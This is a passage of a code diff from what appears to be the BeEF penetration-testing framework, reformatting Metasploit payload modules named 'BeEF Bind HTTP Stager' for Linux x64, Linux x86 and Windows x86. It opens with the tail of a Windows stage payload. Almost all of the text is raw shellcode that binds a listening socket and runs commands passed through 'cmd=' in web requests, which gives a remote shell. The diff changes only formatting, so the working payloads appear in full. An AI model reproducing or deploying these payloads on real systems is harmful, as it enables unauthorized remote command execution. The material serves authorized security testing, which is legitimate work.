"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

67
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
View File

@@ -5,45 +5,40 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [54, 'n'] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" \
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" \
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" \
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" \
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" \
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" \
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" \
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" \
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" \
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" \
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" \
"\x01\xc6\xff\xe6"
}))
end
end

63
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
View File

@@ -5,43 +5,38 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [47, 'n'] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" \
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" \
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" \
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" \
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" \
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" \
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" \
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}))
end
end

85
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
View File

@@ -9,54 +9,49 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Windows
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [200, 'n'] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" \
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" \
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" \
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" \
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" \
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" \
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" \
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" \
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" \
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" \
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" \
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" \
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" \
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" \
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" \
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" \
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}))
end
end